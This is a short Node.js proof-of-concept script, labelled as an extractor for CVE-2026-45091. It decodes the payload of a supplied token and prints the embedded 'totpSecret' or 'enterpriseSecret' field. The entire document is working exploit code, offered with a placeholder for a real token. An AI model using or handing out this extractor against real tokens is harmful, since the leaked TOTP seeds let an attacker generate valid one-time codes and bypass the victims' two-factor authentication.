// extract-totp.js
const token = "...your.token.here...";   // ← Replace with your real token

// Main logic
const payloadB64 = token.split('.')[1];

if (!payloadB64) {
    console.error("❌ Invalid token format");
    process.exit(1);
}

try {
    // Decode base64url payload
    const payload = JSON.parse(
        Buffer.from(payloadB64, 'base64url').toString('utf8')
    );

    // Extract secret
    const totpSecret = payload.totpSecret || payload.enterpriseSecret;

    console.log("=== CVE-2026-45091 TOTP Extractor ===");
    if (totpSecret) {
        console.log("✅ TOTP Secret Found:");
        console.log(totpSecret);
    } else {
        console.log("❌ No totpSecret or enterpriseSecret found in payload.");
        console.log("Full payload:", payload);
    }
} catch (err) {
    console.error("❌ Error decoding token:", err.message);
}